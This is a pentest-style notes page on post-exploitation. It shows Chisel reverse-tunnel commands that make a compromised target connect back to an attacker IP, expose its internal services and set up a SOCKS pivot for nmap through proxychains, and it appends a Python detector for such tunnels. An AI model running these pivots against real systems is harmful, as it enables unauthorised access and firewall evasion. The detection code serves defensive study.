# Post Exploitation

### About Post Exploitation

Post-exploitation refers to the phase of a cybersecurity attack that occurs after an attacker has successfully compromised a target system. During this phase, the attacker aims to maintain access, gather valuable information, escalate privileges, and potentially launch further attacks. It involves activities such as lateral movement within the network, data exfiltration, creating backdoors, and covering their tracks to avoid detection. Post-exploitation is a crucial part of the attack lifecycle as it allows the attacker to maximize the impact of their initial compromise and achieve their ultimate objectives.

### Tunneling with Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. It ships as a single executable that includes both client and server, and is written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

#### Exposing Internal Service

* <https://github.com/jpillora/chisel>

On the attacker machine, start the Chisel server:

```bash
chisel server -p 2525 --socks5 --reverse -v
```

For example, if the target has a service listening on port 8000 on localhost, run this command on the target:

```bash
./chisel client 10.10.14.46:2525 R:8001:127.0.0.1:8000
```

Now we can access the service on port 8001 of our machine.

#### Scanning Internal Server / IP

On the attacker machine, start the Chisel server:

```bash
./chisel server -p 31337 --socks5 --reverse -v
```

On the client (target machine):

```bash
./chisel client 10.10.200.13:31337 R:31338:socks
```

Now, on the attacker machine, add the proxy to `proxychains4.conf`:

```
socks5 127.0.0.1 31338
```

Now you can scan the internal target IP from the attacker machine:

```bash
proxychains4 nmap 192.168.1.337
```
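
For the defensive side of both tunnel setups above, the following added example (not part of the original notes or of the Chisel project) flags process command lines that have the shape of a Chisel reverse tunnel. The names `inspect_cmdline`, `scan` and `SAMPLE_EVENTS` are hypothetical, and the sample command lines are constructed for illustration.

```python
import re
import shlex

# Reverse remote forms used on this page: R:8001:127.0.0.1:8000 and R:31338:socks
REVERSE_REMOTE = re.compile(r"^R:(\d{1,5}):(socks|[^:/\s]+:\d{1,5})$")

# Constructed process-creation command lines (EDR / auditd style), not real telemetry.
SAMPLE_EVENTS = [
    "chisel server -p 2525 --socks5 --reverse -v",
    "./chisel client 10.10.14.46:2525 R:8001:127.0.0.1:8000",
    "/opt/tools/agent client 10.10.200.13:31337 R:31338:socks",
    "python3 -m http.server 8000",
    "redis-cli client list",
]

def inspect_cmdline(cmdline):
    """Return a finding for a Chisel-style reverse tunnel command line, else None.

    Matching is on argument shape, not the executable name, because the
    file name on disk varies between hosts.
    """
    argv = shlex.split(cmdline)
    if len(argv) < 3:
        return None
    mode, args = argv[1], argv[2:]
    if mode == "server" and "--reverse" in args:
        port = next(
            (int(v) for f, v in zip(args, args[1:]) if f in ("-p", "--port") and v.isdigit()),
            None)
        return {"role": "server", "listen_port": port, "socks5": "--socks5" in args}
    if mode == "client":
        remotes = [m.groups() for m in map(REVERSE_REMOTE.match, args) if m]
        if remotes:
            upstream = next(
                (a for a in args if not a.startswith("-") and not REVERSE_REMOTE.match(a)),
                None)
            return {
                "role": "client",
                "upstream": upstream,
                "reverse_listeners": [(int(lp), target) for lp, target in remotes],
            }
    return None

def scan(events):
    """Return (command line, finding) pairs for every event that matches."""
    return [(e, f) for e in events if (f := inspect_cmdline(e))]

if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding, "<-", event)
```

A `client` finding gives the upstream address to look for in egress logs, and each `reverse_listeners` entry names the internal service or SOCKS proxy that the tunnel exposes on the server side.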

### Related Links

* [**Windows Post Exploitation**](/active-directory/post-exploitation.md)
* [**Linux Post Exploitation**](/linux/linux-post-exploitation.md)

